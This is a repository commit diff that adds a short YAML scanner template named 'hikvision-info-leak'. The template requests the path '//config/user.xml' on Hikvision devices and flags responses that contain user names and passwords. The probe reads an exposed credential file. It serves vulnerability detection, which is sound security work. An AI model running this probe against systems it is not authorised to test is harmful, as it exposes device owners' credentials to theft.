Create hikvision-info-leak.yaml
parent
f1f1e8df8d
commit
36c45cfbc9
|
@ -0,0 +1,19 @@
|
|||
id: hikvision-info-leak
|
||||
|
||||
info:
|
||||
name: Hikvision Info Leak
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: exposure,config
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}//config/user.xml'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<user name='
|
||||
- 'password='
|
||||
condition: and
|
Loading…
Reference in New Issue